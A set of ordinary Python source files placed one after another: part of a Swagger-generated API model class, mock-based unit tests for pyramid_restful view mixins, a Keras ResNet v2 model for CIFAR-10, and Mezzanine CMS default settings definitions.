:param workspace_user_information: The workspace_user_information of this WorkspaceUserAuthorization. # noqa: E501
:type: WorkspaceUser
"""
self._workspace_user_information = workspace_user_information
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(WorkspaceUserAuthorization, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WorkspaceUserAuthorization):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
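# A minimal usage sketch (illustrative; not part of the generated client):
#
#   auth = WorkspaceUserAuthorization(can_view='true', can_delete='false')
#   auth.to_dict()  # -> {'can_delete': 'false', ..., 'can_view': 'true', ...}
#   print(auth)     # pretty-printed via __repr__/to_str()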
|
|
import json
from unittest import TestCase, mock
import marshmallow as ma
from pyramid import testing
from pyramid.response import Response
from pyramid_restful import mixins
class MockAPIView:
def model_side_effect(**data):
instance = mock.Mock()
for key, val in data.items():
setattr(instance, key, val)
return instance
model = mock.Mock(side_effect=model_side_effect)
dataset = [
{'name': 'testing', 'id': 1},
{'name': 'testing 2', 'id': 2}
]
def get_query(self):
class MockQuery(list):
def __init__(self, *args):
super().__init__(*args)
def all(self):
return self
ret = MockQuery()
for data in self.dataset:
instance = mock.Mock()
for key, val in data.items():
setattr(instance, key, val)
ret.append(instance)
return ret
def filter_query(self, query):
return query
def get_schema(self, *args, **kwargs):
def dump(data, many=False, **kwargs):
if many:
return [{'id': i.id, 'name': i.name} for i in data], ''
return {'id': data.id, 'name': data.name}, ''
def load(data, partial=False):
if not partial and data['id'] == 4:
raise ma.ValidationError(message={'id': ['invalid value.']})
return data, ''
schema = mock.Mock()
schema.dump = mock.Mock(side_effect=dump)
schema.load = mock.Mock(side_effect=load)
return schema
def paginate_query(self, data):
return [data[0]]
def get_paginated_response(self, data):
return Response(json_body=data)
def get_object(self):
instance = mock.Mock()
for key, val in self.dataset[0].items():
setattr(instance, key, val)
return instance
class MockAPIViewNoPage(MockAPIView):
def paginate_query(self, data):
return None
class ActionMixinView(mixins.ActionSchemaMixin):
retrieve_schema = 'retrieve_schema'
list_schema = 'list_schema'
update_schema = 'update_schema'
create_schema = 'create_schema'
destroy_schema = 'destroy_schema'
schema_class = 'schema_class'
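# MockAPIView above stands in for the APIView surface the mixins touch
# (get_query, get_schema, the pagination helpers, get_object), so each mixin
# can be exercised without a real database session or marshmallow schema.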
# ------ Tests ------
class ModelMixinUnitTests(TestCase):
def setUp(self):
self.request = testing.DummyRequest()
self.request.dbsession = mock.Mock()
def test_list_mixin(self):
class ListViewTest(mixins.ListModelMixin, MockAPIView):
pass
view = ListViewTest()
response = view.list(self.request)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == [{"id": 1, "name": "testing"}]
def test_list_mixin_no_page(self):
class ListViewTest(mixins.ListModelMixin, MockAPIViewNoPage):
pass
view = ListViewTest()
response = view.list(self.request)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == [
{"id": 1, "name": "testing"}, {"id": 2, "name": "testing 2"}
]
def test_retrieve_mixin(self):
class RetrieveViewTest(mixins.RetrieveModelMixin, MockAPIView):
pass
view = RetrieveViewTest()
response = view.retrieve(self.request, id=1)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == {"id": 1, "name": "testing"}
def test_create_mixin(self):
class CreateViewTest(mixins.CreateModelMixin, MockAPIView):
pass
view = CreateViewTest()
view.request = self.request
self.request.json_body = {'id': 3, 'name': 'testing 3'}
response = view.create(self.request)
assert response.status_code == 201
assert json.loads(response.body.decode('utf-8')) == {"id": 3, "name": "testing 3"}
assert self.request.dbsession.add.call_count == 1
def test_bad_create_mixin(self):
class CreateViewTest(mixins.CreateModelMixin, MockAPIView):
pass
view = CreateViewTest()
view.request = self.request
self.request.json_body = {'id': 4, 'name': 'testing 4'}
response = view.create(self.request)
assert response.status_code == 400
assert json.loads(response.body.decode('utf-8')) == {"id": ["invalid value."]}
def test_update(self):
class UpdateViewTest(mixins.UpdateModelMixin, MockAPIView):
pass
view = UpdateViewTest()
self.request.json_body = {'id': 1, 'name': 'testing1'}
response = view.update(self.request)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == {"id": 1, "name": "testing1"}
def test_bad_update(self):
class UpdateViewTest(mixins.UpdateModelMixin, MockAPIView):
pass
view = UpdateViewTest()
self.request.json_body = {'id': 4, 'name': '4testing'}
response = view.update(self.request)
assert response.status_code == 400
def test_partial_update(self):
class UpdateViewTest(mixins.PartialUpdateMixin, MockAPIView):
pass
view = UpdateViewTest()
self.request.json_body = {'name': 'testing1'}
response = view.partial_update(self.request)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == {"id": 1, "name": "testing1"}
def test_destroy(self):
class DestroyViewTest(mixins.DestroyModelMixin, MockAPIView):
pass
view = DestroyViewTest()
view.request = self.request
response = view.destroy(self.request)
assert response.status_code == 204
assert self.request.dbsession.delete.call_count == 1
class TestActionSchemaMixin(TestCase):
def setUp(self):
self.view = ActionMixinView()
def test_retrieve(self):
self.view.action = 'retrieve'
assert self.view.get_schema_class() == 'retrieve_schema'
def test_list(self):
self.view.action = 'list'
assert self.view.get_schema_class() == 'list_schema'
def test_update(self):
self.view.action = 'update'
assert self.view.get_schema_class() == 'update_schema'
def test_partial_update(self):
self.view.action = 'partial_update'
assert self.view.get_schema_class() == 'update_schema'
def test_create(self):
self.view.action = 'create'
assert self.view.get_schema_class() == 'create_schema'
def test_destroy(self):
self.view.action = 'destroy'
assert self.view.get_schema_class() == 'destroy_schema'
def test_default(self):
self.view.action = 'default'
assert self.view.get_schema_class() == 'schema_class'
|
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ResNet20, 56, 110, 164, 1001 version 2 for CIFAR-10
# Paper: https://arxiv.org/pdf/1603.05027.pdf
"""
Modified from: https://git.io/JsPhA
"""
from typing import Tuple, Union
import tensorflow as tf
from tensorflow.keras import Model, Input
from tensorflow.keras.layers import (
Conv2D,
Dense,
BatchNormalization,
ReLU,
Add,
AveragePooling2D,
GlobalAvgPool2D
)
from tensorflow.keras.regularizers import l2
WEIGHT_DECAY = 0.0005
def stem(inputs: tf.Tensor) -> tf.Tensor:
"""Construct Stem Convolutional Group
    inputs : the input tensor
"""
x = Conv2D(
16,
(3, 3),
strides=(1, 1),
padding="same",
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(inputs)
x = BatchNormalization()(x)
x = ReLU()(x)
return x
def learner(x: tf.Tensor, n_blocks: int) -> tf.Tensor:
"""Construct the Learner
x : input to the learner
n_blocks : number of blocks in a group
"""
# First Residual Block Group of 16 filters (Stage 1)
# Quadruple (4X) the size of filters to fit the next Residual Group
x = residual_group(x, 16, n_blocks, strides=(1, 1), n=4)
# Second Residual Block Group of 64 filters (Stage 2)
# Double (2X) the size of filters and reduce feature maps by 75% (strides=2)
# to fit the next Residual Group.
x = residual_group(x, 64, n_blocks, n=2)
    # Third Residual Block Group of 128 filters (Stage 3)
# Double (2X) the size of filters and reduce feature maps by 75% (strides=2)
# to fit the next Residual Group
x = residual_group(x, 128, n_blocks, n=2)
return x
def residual_group(x: tf.Tensor, n_filters: int, n_blocks: int,
                   strides: Union[int, Tuple[int, int]] = (2, 2), n: int = 2) -> tf.Tensor:
"""Construct a Residual Group
x : input into the group
n_filters : number of filters for the group
n_blocks : number of residual blocks with identity link
strides : whether the projection block is a strided convolution
n : multiplier for the number of filters out
"""
# Double the size of filters to fit the first Residual Group
x = projection_block(x, n_filters, strides=strides, n=n)
# Identity residual blocks
for _ in range(n_blocks):
x = identity_block(x, n_filters, n)
return x
def identity_block(x: tf.Tensor, n_filters: int, n: int = 2) -> tf.Tensor:
"""Construct a Bottleneck Residual Block of Convolutions
x : input into the block
n_filters: number of filters
n : multiplier for filters out
"""
# Save input vector (feature maps) for the identity link
shortcut = x
## Construct the 1x1, 3x3, 1x1 residual block (fig 3c)
# Dimensionality reduction
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters,
(1, 1),
strides=(1, 1),
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Bottleneck layer
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters,
(3, 3),
strides=(1, 1),
padding="same",
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Dimensionality restoration - increase the number of output filters by
# 2X or 4X
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters * n,
(1, 1),
strides=(1, 1),
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Add the identity link (input) to the output of the residual block
x = Add()([x, shortcut])
return x
def projection_block(x: tf.Tensor, n_filters: int,
                     strides: Union[int, Tuple[int, int]] = (2, 2), n: int = 2) -> tf.Tensor:
"""Construct a Bottleneck Residual Block with Projection Shortcut
Increase the number of filters by 2X (or 4X on first stage)
x : input into the block
n_filters: number of filters
strides : whether the first convolution is strided
n : multiplier for number of filters out
"""
# Construct the projection shortcut
# Increase filters by 2X (or 4X) to match shape when added to output of block
shortcut = Conv2D(
n_filters * n,
(1, 1),
strides=strides,
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
## Construct the 1x1, 3x3, 1x1 convolution block
# Dimensionality reduction
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters,
(1, 1),
strides=(1, 1),
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Bottleneck layer - feature pooling when strides=(2, 2)
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters,
(3, 3),
strides=strides,
padding="same",
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Dimensionality restoration - increase the number of filters by 2X (or 4X)
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters * n,
(1, 1),
strides=(1, 1),
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Add the projection shortcut to the output of the residual block
x = Add()([shortcut, x])
return x
def classifier(x: tf.Tensor, n_classes: int = 10) -> tf.Tensor:
"""Construct a Classifier
x : input into the classifier
n_classes : number of classes
"""
# Pool the feature maps after the end of all the residual blocks
x = BatchNormalization()(x)
x = ReLU()(x)
x = AveragePooling2D(pool_size=8)(x)
# Flatten into 1D vector
x = GlobalAvgPool2D()(x)
# Final Dense Outputting Layer
outputs = Dense(n_classes, activation="softmax",
kernel_initializer="he_normal")(x)
return outputs
# -------------------
# Model | n |
# ResNet20 | 2 |
# ResNet56 | 6 |
# ResNet110 | 12 |
# ResNet164 | 18 |
# ResNet1001 | 111 |
#
n = 18
depth = n * 9 + 2
n_blocks = ((depth - 2) // 9) - 1
# The input tensor
inputs = Input(shape=(32, 32, 3))
# The Stem Convolution Group
x = stem(inputs)
# The learner
x = learner(x, n_blocks)
# The Classifier for 10 classes
outputs = classifier(x, 10)
# Instantiate the Model
model = Model(inputs, outputs)
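if __name__ == "__main__":
    # A minimal sanity check: compile and print the architecture. The
    # optimizer and loss below are illustrative choices, not prescribed
    # by the paper.
    model.compile(optimizer="adam",
                  loss="categorical_crossentropy",
                  metrics=["accuracy"])
    model.summary()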
|
|
"""
Default settings for the ``mezzanine.core`` app. Each of these can be
overridden in your project's settings module, just like regular
Django settings. The ``editable`` argument for each controls whether
the setting is editable via Django's admin.
Thought should be given to how a setting is actually used before
making it editable, as it may be inappropriate - for example settings
that are only read during startup shouldn't be editable, since changing
them would require an application reload.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from mezzanine.conf import register_setting
register_setting(
name="ADMIN_MENU_ORDER",
description=_("Controls the ordering and grouping of the admin menu."),
editable=False,
default=(
(_("Content"), ("pages.Page", "blog.BlogPost",
"generic.ThreadedComment", (_("Media Library"), "media-library"),)),
(_("Site"), ("sites.Site", "redirects.Redirect", "conf.Setting")),
(_("Users"), ("auth.User", "auth.Group",)),
),
)
register_setting(
name="ADMIN_MENU_COLLAPSED",
label=_("Collapse the Admin menu"),
description=_("Controls whether or not the left-hand admin menu is "
"collapsed by default."),
editable=True,
default=False,
)
register_setting(
name="ADMIN_REMOVAL",
description=_("Unregister these models from the admin."),
editable=False,
default=(),
)
register_setting(
name="ADMIN_THUMB_SIZE",
description=_("Size of thumbnail previews for image fields in the "
"admin interface."),
editable=False,
default="24x24",
)
register_setting(
name="AKISMET_API_KEY",
label=_("Akismet API Key"),
description=_("Key for http://akismet.com spam filtering service. Used "
"for filtering comments and forms."),
editable=True,
default="",
)
register_setting(
name="BITLY_ACCESS_TOKEN",
label=_("bit.ly access token"),
description=_("Access token for http://bit.ly URL shortening service."),
editable=True,
default="",
)
register_setting(
name="CACHE_SET_DELAY_SECONDS",
description=_("Mezzanine's caching uses a technique know as mint "
"caching. This is where the requested expiry for a cache entry "
"is stored with the cache entry in cache, and the real expiry "
"used has the ``CACHE_SET_DELAY`` added to it. Then on a cache get, "
"the store expiry is checked, and if it has passed, the cache entry "
"is set again, and no entry is returned. This tries to ensure that "
"cache misses never occur, and if many clients were to get a cache "
"miss at once, only one would actually need to re-generated the "
"cache entry."),
editable=False,
default=30,
)
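# A minimal sketch of the mint caching technique described above (the
# function names and cache API shape are illustrative, not Mezzanine's
# actual implementation):
#
#   from time import time
#
#   def mint_set(cache, key, value, expiry, delay=30):
#       # Store the requested expiry with the value; pad the real expiry.
#       cache.set(key, (value, time() + expiry), expiry + delay)
#
#   def mint_get(cache, key, expiry, delay=30):
#       entry = cache.get(key)
#       if entry is None:
#           return None
#       value, stale_at = entry
#       if time() > stale_at:
#           # Re-set the stale value so concurrent clients keep being
#           # served, then report a miss so this client regenerates it.
#           cache.set(key, (value, time() + expiry), expiry + delay)
#           return None
#       return value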
if "mezzanine.blog" in settings.INSTALLED_APPS:
dashboard_tags = (
("blog_tags.quick_blog", "mezzanine_tags.app_list"),
("comment_tags.recent_comments",),
("mezzanine_tags.recent_actions",),
)
else:
dashboard_tags = (
("mezzanine_tags.app_list",),
("mezzanine_tags.recent_actions",),
(),
)
register_setting(
name="DASHBOARD_TAGS",
description=_("A three item sequence, each containing a sequence of "
"template tags used to render the admin dashboard."),
editable=False,
default=dashboard_tags,
)
register_setting(
name="DEVICE_DEFAULT",
description=_("Device specific template sub-directory to use as the "
"default device."),
editable=False,
default="",
)
register_setting(
name="DEVICE_USER_AGENTS",
description=_("Mapping of device specific template sub-directory names to "
"the sequence of strings that may be found in their user agents."),
editable=False,
default=(
("mobile", ("2.0 MMP", "240x320", "400X240", "AvantGo", "BlackBerry",
"Blazer", "Cellphone", "Danger", "DoCoMo", "Elaine/3.0",
"EudoraWeb", "Googlebot-Mobile", "hiptop", "IEMobile",
"KYOCERA/WX310K", "LG/U990", "MIDP-2.", "MMEF20", "MOT-V",
"NetFront", "Newt", "Nintendo Wii", "Nitro", "Nokia",
"Opera Mini", "Palm", "PlayStation Portable", "portalmmm",
"Proxinet", "ProxiNet", "SHARP-TQ-GX10", "SHG-i900",
"Small", "SonyEricsson", "Symbian OS", "SymbianOS",
"TS21i-10", "UP.Browser", "UP.Link", "webOS", "Windows CE",
"WinWAP", "YahooSeeker/M1A1-R2D2", "iPhone", "iPod", "Android",
"BlackBerry9530", "LG-TU915 Obigo", "LGE VX", "webOS",
"Nokia5800",)),
),
)
register_setting(
name="FORMS_USE_HTML5",
description=_("If ``True``, website forms will use HTML5 features."),
editable=False,
default=False,
)
register_setting(
name="EMAIL_FAIL_SILENTLY",
description=_("If ``True``, failures to send email will happen "
"silently, otherwise an exception is raised. "
"Defaults to ``settings.DEBUG``."),
editable=False,
default=settings.DEBUG,
)
register_setting(
name="EXTRA_MODEL_FIELDS",
description=_("A sequence of fields that will be injected into "
"Mezzanine's (or any library's) models. Each item in the sequence is "
"a four item sequence. The first two items are the dotted path to the "
"model and its field name to be added, and the dotted path to the "
"field class to use for the field. The third and fourth items are a "
"sequence of positional args and a dictionary of keyword args, to use "
"when creating the field instance. When specifying the field class, "
"the path ``django.models.db.`` can be omitted for regular Django "
"model fields."),
editable=False,
default=(),
)
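# An illustrative EXTRA_MODEL_FIELDS entry (the model, field name and
# keyword arguments below are hypothetical):
#
#   EXTRA_MODEL_FIELDS = (
#       ("mezzanine.blog.models.BlogPost.image",
#        "ImageField",
#        ("Image",),
#        {"blank": True, "upload_to": "blog"}),
#   )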
register_setting(
name="GOOGLE_ANALYTICS_ID",
label=_("Google Analytics ID"),
description=_("Google Analytics ID (http://www.google.com/analytics/)"),
editable=True,
default="",
)
register_setting(
name="GOOGLE_MAPS_API_KEY",
label=_("Google Maps API Key"),
description=_("Key for Google Maps API (http://www.maps.google.com)"),
editable=True,
default="",
)
register_setting(
name="HOST_THEMES",
description=_("A sequence mapping host names to themes, allowing "
"different templates to be served per HTTP host. "
"Each item in the sequence is a two item sequence, "
"containing a host such as ``othersite.example.com``, and "
"the name of an importable Python package for the theme. "
"If the host is matched for a request, the templates "
"directory inside the theme package will be first searched "
"when loading templates."),
editable=False,
default=(),
)
register_setting(
name="INLINE_EDITING_ENABLED",
description=_("If ``True``, front-end inline editing will be enabled."),
editable=False,
default=True,
)
register_setting(
name="JQUERY_FILENAME",
label=_("Name of the jQuery file."),
description=_("Name of the jQuery file found in "
"mezzanine/core/static/mezzanine/js/"),
editable=False,
default="jquery-1.8.3.min.js",
)
register_setting(
name="JQUERY_UI_FILENAME",
label=_("Name of the jQuery UI file."),
description=_("Name of the jQuery UI file found in "
"mezzanine/core/static/mezzanine/js/"),
editable=False,
default="jquery-ui-1.8.24.min.js",
)
register_setting(
name="MAX_PAGING_LINKS",
label=_("Max paging links"),
description=_("Max number of paging links to display when paginating."),
editable=True,
default=10,
)
register_setting(
name="MEDIA_LIBRARY_PER_SITE",
label=_("Media library per site"),
description=_("If ``True``, each site will use its own directory within "
"the filebrowser media library."),
editable=False,
default=False,
)
register_setting(
name="OWNABLE_MODELS_ALL_EDITABLE",
description=_("Models that subclass ``Ownable`` and use the "
"``OwnableAdmin`` have their admin change-list records filtered "
"down to records owned by the current user. This setting contains a "
"sequence of models in the format ``app_label.object_name``, that "
"when subclassing ``Ownable``, will still show all records in the "
"admin change-list interface, regardless of the current user."),
editable=False,
default=(),
)
register_setting(
name="RICHTEXT_WIDGET_CLASS",
description=_("Dotted package path and class name of the widget to use "
"for the ``RichTextField``."),
editable=False,
default="mezzanine.core.forms.TinyMceWidget",
)
register_setting(
name="RICHTEXT_ALLOWED_TAGS",
description=_("List of HTML tags that won't be stripped from "
"``RichTextField`` instances."),
editable=False,
default=("a", "abbr", "acronym", "address", "area", "article", "aside",
"b", "bdo", "big", "blockquote", "br", "button", "caption", "center",
"cite", "code", "col", "colgroup", "dd", "del", "dfn", "dir", "div",
"dl", "dt", "em", "fieldset", "figure", "font", "footer", "form",
"h1", "h2", "h3", "h4", "h5", "h6", "header", "hr", "i", "img",
"input", "ins", "kbd", "label", "legend", "li", "map", "menu",
"nav", "ol", "optgroup", "option", "p", "pre", "q", "s", "samp",
"section", "select", "small", "span", "strike", "strong",
"sub", "sup", "table", "tbody", "td", "textarea",
"tfoot", "th", "thead", "tr", "tt", "u", "ul", "var", "wbr"),
)
register_setting(
name="RICHTEXT_ALLOWED_ATTRIBUTES",
description=_("List of HTML attributes that won't be stripped from "
"``RichTextField`` instances."),
editable=False,
default=("currency", "price", "abbr", "accept", "accept-charset", "accesskey", "action",
"align", "alt", "axis", "border", "cellpadding", "cellspacing",
"char", "charoff", "charset", "checked", "cite", "class", "clear",
"cols", "colspan", "color", "compact", "coords", "datetime", "dir",
"disabled", "enctype", "for", "frame", "headers", "height", "href",
"hreflang", "hspace", "id", "ismap", "label", "lang", "longdesc",
"maxlength", "media", "method", "multiple", "name", "nohref",
"noshade", "nowrap", "prompt", "readonly", "rel", "rev", "rows",
"rowspan", "rules", "scope", "selected", "shape", "size", "span",
"src", "start", "style", "summary", "tabindex", "target", "title",
"type", "usemap", "valign", "value", "vspace", "width", "xml:lang"),
)
register_setting(
name="RICHTEXT_ALLOWED_STYLES",
description=_("List of inline CSS styles that won't be stripped from "
"``RichTextField`` instances."),
editable=False,
default=("border", "display", "float", "list-style-type", "margin",
"margin-bottom", "margin-left", "margin-right", "margin-top",
"padding-left", "text-align", "text-decoration", "vertical-align"),
)
register_setting(
name="RICHTEXT_FILTERS",
description=_("List of dotted paths to functions, called in order, on a "
"``RichTextField`` value before it is rendered to the template."),
editable=False,
default=("mezzanine.utils.html.thumbnails",),
)
RICHTEXT_FILTER_LEVEL_HIGH = 1
RICHTEXT_FILTER_LEVEL_LOW = 2
RICHTEXT_FILTER_LEVEL_NONE = 3
RICHTEXT_FILTER_LEVELS = (
(RICHTEXT_FILTER_LEVEL_HIGH, _("High")),
(RICHTEXT_FILTER_LEVEL_LOW, _("Low (allows video, iframe, Flash, etc)")),
(RICHTEXT_FILTER_LEVEL_NONE, _("No filtering")),
)
register_setting(
name="RICHTEXT_FILTER_LEVEL",
label=_("Rich Text filter level"),
description=_("*Do not change this setting unless you know what you're "
"doing.*\n\nWhen content is saved in a Rich Text (WYSIWYG) field, "
"unsafe HTML tags and attributes are stripped from the content to "
"protect against staff members intentionally adding code that could "
"be used to cause problems, such as changing their account to "
"a super-user with full access to the system.\n\n"
"This setting allows you to change the level of filtering that "
"occurs. Setting it to low will allow certain extra tags to be "
"permitted, such as those required for embedding video. While these "
"tags are not the main candidates for users adding malicious code, "
"they are still considered dangerous and could potentially be "
"mis-used by a particularly technical user, and so are filtered out "
"when the filtering level is set to high.\n\n"
"Setting the filtering level to no filtering, will disable all "
"filtering, and allow any code to be entered by staff members, "
"including script tags."),
editable=True,
choices=RICHTEXT_FILTER_LEVELS,
default=RICHTEXT_FILTER_LEVEL_HIGH,
)
register_setting(
name="SEARCH_MODEL_CHOICES",
description=_("Sequence of models that will be provided by default as "
"choices in the search form. Each model should be in the format "
"``app_label.model_name``. Only models that subclass "
"``mezzanine.core.models.Displayable`` should be used."),
editable=False,
default=("pages.Page", "blog.BlogPost"),
)
register_setting(
name="SEARCH_PER_PAGE",
label=_("Search results per page"),
description=_("Number of results shown in the search results page."),
editable=True,
default=10,
)
register_setting(
name="SITE_PREFIX",
description=_("A URL prefix for mounting all of Mezzanine's urlpatterns "
"under. When using this, you'll also need to manually apply it to "
"your project's root ``urls.py`` module. The root ``urls.py`` module "
"provided by Mezzanine's ``mezzanine-project`` command contains an "
"example of this towards its end."),
editable=False,
default="",
)
register_setting(
name="SITE_TITLE",
label=_("Site Title"),
description=_("Title that will display at the top of the site, and be "
"appended to the content of the HTML title tags on every page."),
editable=True,
default="Mezzanine",
translatable=True,
)
register_setting(
name="SITE_TAGLINE",
label=_("Tagline"),
description=_("A tag line that will appear at the top of all pages."),
editable=True,
default=_("An open source content management platform."),
translatable=True,
)
register_setting(
name="SLUGIFY",
description=_("Dotted Python path to the callable for converting "
"strings into URL slugs. Defaults to "
"``mezzanine.utils.urls.slugify_unicode`` which allows for non-ascii "
"URLs. Change to ``django.template.defaultfilters.slugify`` to use "
"Django's slugify function, or something of your own if required."),
editable=False,
default="mezzanine.utils.urls.slugify_unicode",
)
register_setting(
name="SPAM_FILTERS",
description=_("Sequence of dotted Python paths to callable functions "
"used for checking posted content (such as forms or comments) is "
"spam. Each function should accept three arguments: the request "
"object, the form object, and the URL that was posted from. "
"Defaults to ``mezzanine.utils.views.is_spam_akismet`` which will "
"use the http://akismet.com spam filtering service when the "
"``AKISMET_API_KEY`` setting is configured."),
editable=False,
default=("mezzanine.utils.views.is_spam_akismet",),
)
register_setting(
name="SSL_ENABLED",
label=_("Enable SSL"),
description=_("If ``True``, users will be automatically redirected to "
"HTTPS for the URLs specified by the ``SSL_FORCE_URL_PREFIXES`` "
"setting."),
editable=True,
default=False,
)
register_setting(
name="SSL_FORCE_HOST",
label=_("Force Host"),
description=_("Host name that the site should always be accessed via that "
"matches the SSL certificate."),
editable=True,
default="",
)
register_setting(
name="SSL_FORCE_URL_PREFIXES",
description="Sequence of URL prefixes that will be forced to run over "
"SSL when ``SSL_ENABLED`` is ``True``. i.e. "
"('/admin', '/example') would force all URLs beginning with "
"/admin or /example to run over SSL.",
editable=False,
default=("/admin", "/account"),
)
register_setting(
name="SSL_FORCED_PREFIXES_ONLY",
description=_("If ``True``, only URLs specified by the "
"``SSL_FORCE_URL_PREFIXES`` setting will be accessible over SSL, "
"and all other URLs will be redirected back to HTTP if accessed "
"over HTTPS."),
editable=False,
default=True,
)
register_setting(
name="STOP_WORDS",
description=_("List of words which will be stripped from search queries."),
editable=False,
default=(
"a", "about", "above", "above", "across", "after",
"afterwards", "again", "against", "all", "almost", "alone",
"along", "already", "also", "although", "always", "am",
"among", "amongst", "amoungst", "amount", "an", "and",
"another", "any", "anyhow", "anyone", "anything", "anyway",
"anywhere", "are", "around", "as", "at", "back", "be",
"became", "because", "become", "becomes", "becoming", "been",
"before", "beforehand", "behind", "being", "below", "beside",
"besides", "between", "beyond", "bill", "both", "bottom",
"but", "by", "call", "can", "cannot", "cant", "co", "con",
"could", "couldnt", "cry", "de", "describe", "detail", "do",
"done", "down", "due", "during", "each", "eg", "eight",
"either", "eleven", "else", "elsewhere", "empty", "enough",
"etc", "even", "ever", "every", "everyone", "everything",
"everywhere", "except", "few", "fifteen", "fifty", "fill",
"find", "fire", "first", "five", "for", "former", "formerly",
"forty", "found", "four", "from", "front", "full", "further",
"get", "give", "go", "had", "has", "hasnt", "have", "he",
"hence", "her", "here", "hereafter", "hereby", "herein",
"hereupon", "hers", "herself", "him", "himself", "his",
"how", "however", "hundred", "ie", "if", "in", "inc",
"indeed", "interest", "into", "is", "it", "its", "itself",
"keep", "last", "latter", "latterly", "least", "less", "ltd",
"made", "many", "may", "me", "meanwhile", "might", "mill",
"mine", "more", "moreover", "most", "mostly", "move", "much",
"must", "my", "myself", "name", "namely", "neither", "never",
"nevertheless", "next", "nine", "no", "nobody", "none",
"noone", "nor", "not", "nothing", "now", "nowhere", "of",
"off", "often", "on", "once", "one", "only", "onto", "or",
"other", "others", "otherwise", "our", "ours", "ourselves",
"out", "over", "own", "part", "per", "perhaps", "please",
"put", "rather", "re", "same", "see", "seem", "seemed",
"seeming", "seems", "serious", "several", "she", "should",
"show", "side", "since", "sincere", "six", "sixty", "so",
"some", "somehow", "someone", "something", "sometime",
"sometimes", "somewhere", "still", "such", "system", "take",
"ten", "than", "that", "the", "their", "them", "themselves",
"then", "thence", "there", "thereafter", "thereby",
"therefore", "therein", "thereupon", "these", "they",
"thickv", "thin", "third", "this", "those", "though",
"three", "through", "throughout", "thru", "thus", "to",
"together", "too", "top", "toward", "towards", "twelve",
"twenty", "two", "un", "under", "until", "up", "upon", "us",
"very", "via", "was", "we", "well", "were", "what", "whatever",
"when", "whence", "whenever", "where", "whereafter", "whereas",
"whereby", "wherein", "whereupon", "wherever", "whether",
"which", "while", "whither", "who", "whoever", "whole", "whom",
"whose", "why", "will", "with", "within", "without", "would",
"yet", "you", "your", "yours", "yourself", "yourselves", "the",
),
)
register_setting(
name="TAG_CLOUD_SIZES",
label=_("Tag Cloud Sizes"),
description=_("Number of different sizes for tags when shown as a cloud."),
editable=True,
default=4,
)
register_setting(
name="TEMPLATE_ACCESSIBLE_SETTINGS",
description=_("Sequence of setting names available within templates."),
editable=False,
default=(
"ACCOUNTS_APPROVAL_REQUIRED", "ACCOUNTS_VERIFICATION_REQUIRED",
"ADMIN_MENU_COLLAPSED",
"BITLY_ACCESS_TOKEN", "BLOG_USE_FEATURED_IMAGE",
"COMMENTS_DISQUS_SHORTNAME", "COMMENTS_NUM_LATEST",
"COMMENTS_DISQUS_API_PUBLIC_KEY", "COMMENTS_DISQUS_API_SECRET_KEY",
"COMMENTS_USE_RATINGS", "DEV_SERVER", "FORMS_USE_HTML5",
"GRAPPELLI_INSTALLED", "GOOGLE_MAPS_API_KEY", "GOOGLE_ANALYTICS_ID",
"JQUERY_FILENAME",
"JQUERY_UI_FILENAME", "LOGIN_URL", "LOGOUT_URL", "SITE_TITLE",
"SITE_TAGLINE", "USE_L10N", "USE_MODELTRANSLATION",
),
)
register_setting(
name="THUMBNAILS_DIR_NAME",
description=_("Directory name to store thumbnails in, that will be "
"created relative to the original image's directory."),
editable=False,
default=".thumbnails",
)
register_setting(
name="TINYMCE_SETUP_JS",
description=_("URL for the JavaScript file (relative to ``STATIC_URL``) "
"that handles configuring TinyMCE when the default "
"``RICHTEXT_WIDGET_CLASS`` is used."),
editable=False,
default="mezzanine/js/tinymce_setup.js",
)
register_setting(
name="UPLOAD_TO_HANDLERS",
description=_("Dict mapping file field names in the format "
"``app_label.model_name.field_name`` to the Python dotted path "
"to function names that will be used for the file field's "
"``upload_to`` argument."),
editable=False,
default={},
)
# The following settings are defined here for documentation purposes
# as this file is used to auto-generate the documentation for all
